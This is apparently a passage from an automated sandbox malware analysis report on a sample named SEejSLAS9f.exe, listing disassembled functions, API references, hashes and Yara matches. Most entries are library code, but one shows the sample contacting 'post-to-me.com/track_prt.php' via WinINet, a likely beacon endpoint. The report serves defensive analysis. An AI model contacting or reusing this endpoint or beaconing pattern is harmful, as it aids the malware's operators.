GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
GdiplusShutdown.GDIPLUS(?), ref: 004020E3

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
String ID:
API String ID: 2357751836-0
Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8

Function 024750C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo.LIBCPMT ref: 024750A3
std::_Locinfo::~_Locinfo.LIBCPMT ref: 024750B7
std::_Locinfo::_Locinfo.LIBCPMT ref: 0247511C
__Getcoll.LIBCPMT ref: 0247512B
std::_Locinfo::~_Locinfo.LIBCPMT ref: 0247513B

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
String ID:
API String ID: 2395760641-0
Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction ID: 395c1ffbd8be14887cdae244d72618791d151c1109a24223cde4737e02e7dbb4
Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
Instruction Fuzzy Hash: AC2198B2814208AFDB11EFA5C484BDDBBB1FF50716F50845FE4A5AB280DBB49948CF91

Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
_free.LIBCMT ref: 00431F98
_free.LIBCMT ref: 00431FBF
SetLastError.KERNEL32(00000000), ref: 00431FCC
SetLastError.KERNEL32(00000000), ref: 00431FD5

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D

Function 024A21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(0247DAD7,0247DAD7,00000002,0249ED35,024A3951,00000000,?,02496A05,00000002,00000000,00000000,00000000,?,0247CF88,0247DAD7,00000004), ref: 024A21CA
_free.LIBCMT ref: 024A21FF
_free.LIBCMT ref: 024A2226
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A2233
SetLastError.KERNEL32(00000000,?,0247DAD7), ref: 024A223C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction ID: 3f866474c3a6331fbe90defd2663998d42fcd66c8cb0b230a2ee07bafb44e7a1
Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
Instruction Fuzzy Hash: 1501F937245B003B9316AB355C64E6B262EABF1B72B10013FFC15963D1EFF088069529

Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
_free.LIBCMT ref: 00431F11
_free.LIBCMT ref: 00431F39
SetLastError.KERNEL32(00000000), ref: 00431F46
SetLastError.KERNEL32(00000000), ref: 00431F52

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D

Function 024A2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0249A9EC,?,00000000,?,0249CDE6,0247247E,00000000,?,00451F20), ref: 024A2145
_free.LIBCMT ref: 024A2178
_free.LIBCMT ref: 024A21A0
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21AD
SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024A21B9

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction ID: 530fb421b4aeea4bdd977ac753655353c8eb359f940b8d7925027ee7f25cb720
Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
Instruction Fuzzy Hash: DCF0A935544A003BD617A735AC29B1F262A9FF2F62F15012FFD1992390EFE185029529

Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A

Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
__CxxThrowException@8.LIBVCRUNTIME ref: 0041798A

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD

Function 02487B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 024829A4: TlsGetValue.KERNEL32(?,?,02480DC2,02482ECF,00000000,?,02480DA0,?,?,?,00000000,?,00000000), ref: 024829AA

Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 02487BB1

Part of subcall function 0249121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 02491241
Part of subcall function 0249121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0249125A
Part of subcall function 0249121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024912D0
Part of subcall function 0249121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024912D8

Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 02487BBF
Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 02487BC9
Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 02487BD3
__CxxThrowException@8.LIBVCRUNTIME ref: 02487BF1

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
String ID:
API String ID: 4266703842-0
Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction ID: 61cfcb8a269d5cf9be908b7264bd024e1ef9575c5d928871ac7cba30587f69f1
Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
Instruction Fuzzy Hash: 9EF0F035A206586BCF15F7BB882096EFA6BDFC1B18B10416FD811A3350EF649E058ED2

Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00439E5D

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 00439E6F
_free.LIBCMT ref: 00439E81
_free.LIBCMT ref: 00439E93
_free.LIBCMT ref: 00439EA5

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D

Function 024AA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 024AA0C4

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024AA0D6
_free.LIBCMT ref: 024AA0E8
_free.LIBCMT ref: 024AA0FA
_free.LIBCMT ref: 024AA10C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction ID: 9bdfb0a4629b27b43b71d5c52d9e02c352ffd42c6b8cc2325cd89e18435b3b67
Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
Instruction Fuzzy Hash: EAF06232509620AB8670EF59E8D6C0777EAAA14790764095BF008D7B11CB75F890CE59

Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00431748

Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492

_free.LIBCMT ref: 0043175A
_free.LIBCMT ref: 0043176D
_free.LIBCMT ref: 0043177E
_free.LIBCMT ref: 0043178F

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E

Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
GetCurrentThread.KERNEL32 ref: 0041CD09
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A

Function 024A1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 024A19AF

Part of subcall function 024A36D1: HeapFree.KERNEL32(00000000,00000000,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?), ref: 024A36E7
Part of subcall function 024A36D1: GetLastError.KERNEL32(?,?,024AA35F,?,00000000,?,00000000,?,024AA603,?,00000007,?,?,024AA9F7,?,?), ref: 024A36F9

_free.LIBCMT ref: 024A19C1
_free.LIBCMT ref: 024A19D4
_free.LIBCMT ref: 024A19E5
_free.LIBCMT ref: 024A19F6

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction ID: eab23c0ae3902ff33b016c09165dc377b5b01624257cc4ec4544991858f8d174
Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
Instruction Fuzzy Hash: FEF03070D047109F9F716F19AD904053F65AF29B62B0002ABF406977B2D774E862DF8E

Function 0248CF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON

Download Yara Rule

APIs

Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0248CF36
Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0248CF67
GetCurrentThread.KERNEL32 ref: 0248CF70
Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0248CF83
Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0248CF8C

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
String ID:
API String ID: 2583373041-0
Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction ID: e6a92c96a1e9fdf56f5bc352c87485f8e7f320f972e9c2675893e6a14a246b5b
Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
Instruction Fuzzy Hash: 57F03736211500DBC629FF62E6909BFB7B6AFC4610310455FE68747590CF21A947DB71

Function 02472E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02472E8E

Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471328
Part of subcall function 02471321: _wcslen.LIBCMT ref: 02471344

InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024730A1

Strings

&cc=DE, xrefs: 0247301B, 02473021, 0247307E
https://post-to-me.com/track_prt.php?sub=, xrefs: 02472EBE, 02472FEA, 02473059

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: InternetOpen_wcslen
String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
API String ID: 3381584094-4083784958
Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction ID: d5ccd31b2cbb2af03a9fe18a5c51409eb2b1ea8232e5f65add460cab39c645ed
Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
Instruction Fuzzy Hash: CA5153A5E55344A8E320EFB0BC45B723378FF58712F10543BD528CB2B2E7A19944871E

Function 02498937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 0249896A
__IsNonwritableInCurrentImage.LIBCMT ref: 02498A23

Strings

csm, xrefs: 02498A0D
fB, xrefs: 02498A15, 02498A1E, 02498A2F

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: fB$csm
API String ID: 3480331319-1586063737
Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction ID: 5ca6f334394dd3f6877c4931c8ecc33140facd94952ab1d27af6a3bf6aac2051
Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
Instruction Fuzzy Hash: 8741D434A002489FCF10DF2DC884AAEBFA5AF46328F14816BE9159B391D7329A01CF91

Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SEejSLAS9f.exe,00000104), ref: 0042F753
_free.LIBCMT ref: 0042F81E
_free.LIBCMT ref: 0042F828

Strings

C:\Users\user\Desktop\SEejSLAS9f.exe, xrefs: 0042F74A, 0042F751, 0042F780, 0042F7B8

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\SEejSLAS9f.exe
API String ID: 2506810119-2559146330
Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98

Function 0249F97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\SEejSLAS9f.exe,00000104), ref: 0249F9BA
_free.LIBCMT ref: 0249FA85
_free.LIBCMT ref: 0249FA8F

Strings

C:\Users\user\Desktop\SEejSLAS9f.exe, xrefs: 0249F9B1, 0249F9B8, 0249F9E7, 0249FA1F

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\SEejSLAS9f.exe
API String ID: 2506810119-2559146330
Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction ID: d499d96f1402e211989b74375e3031a87a9e10ca23de15f59ada815345c43f70
Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
Instruction Fuzzy Hash: 7D317C71A00258EFDF21DF9A9C8099EBFFCEF99710B1140ABE804D7621D6709A44CB90

Function 0247C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0247C8DE

Strings

ios_base::eofbit set, xrefs: 0247C8B0
ios_base::badbit set, xrefs: 0247C8A1, 0247C8C1
ios_base::failbit set, xrefs: 0247C8AB

Memory Dump Source

Source File: 00000000.00000002.4093665452.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_SEejSLAS9f.jbxd

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction ID: 049c6727811fb1aa356781be3b944feec525705c1a35b402c3ec987ade1b52c4
Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
Instruction Fuzzy Hash: 68F050B3C406086BCB04EA54CDC1BEF33989B06316F04806FDD62AB182EB789945CFA4

Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction ID: 460a7fcc700e9d4f467f0dc096aafbc476958de37b1de63dc97b6f39ac05addf
Opcode Fuzzy Hash: 6ee01334007aa82adf3d340a5c4addfef0f1634db691a06ca807f035a44bf27a
Instruction Fuzzy Hash: 05F09772B8431675FA203B727D0BBAB15140F10B49F8A043FBE09D91C3DEACC550806E

Function 0042DF7D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017,00431F5D), ref: 0042DF99
GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
ExitThread.KERNEL32 ref: 0042DFDA

Strings

F(@, xrefs: 0042DFCC, 0040F1E7

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: ErrorExitFeatureLastPresentProcessorThread
String ID: F(@
API String ID: 3213686812-2698495834
Opcode ID: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction ID: f8bb832dc8ad97d2a89c5ed14b9cd2946ef4cec1cab2ecc574275c3dd80a03eb
Opcode Fuzzy Hash: 91ee149d9fba369ee1c9d7eb174c136b293f55629d39eb1465d14400ab2c345a
Instruction Fuzzy Hash: 50F05571BC431A36FA203BA17D0BB961A150F14B49F5A043BBF09991C3DAAC8550406E

Function 004242C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::DestroyVirtualProcessorRoot.LIBCONCRT ref: 004242F9
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042430B
__CxxThrowException@8.LIBVCRUNTIME ref: 00424319

Strings

pScheduler, xrefs: 00424303

Memory Dump Source

Source File: 00000000.00000002.4093219448.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SEejSLAS9f.jbxd

Similarity

API ID: Concurrency::details::DestroyException@8ProcessorProxy::RootSchedulerThrowVirtualstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 1381464787-923244539
Opcode ID: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction ID: b798ba3940b90e8ef47deb55f62f39db73067ed213726d5ff045b7a271978ec1
Opcode Fuzzy Hash: 769659e6d923c4b3552f231c3f44feecbe41b2cf6e321d8ec93b2c2c5784424a
Instruction Fuzzy Hash: 01F0EC31B012246BCB18FB55F842DAE73A99E40304791826FFC07A3582CF7CAA48C75D

Function 0041E61D Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0041E63F
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041E652
__CxxThrowException@8.LIBVCRUNTIME ref: 0041E660

Strings

pContext, xrefs: 0041E64A

Memory Dump Source

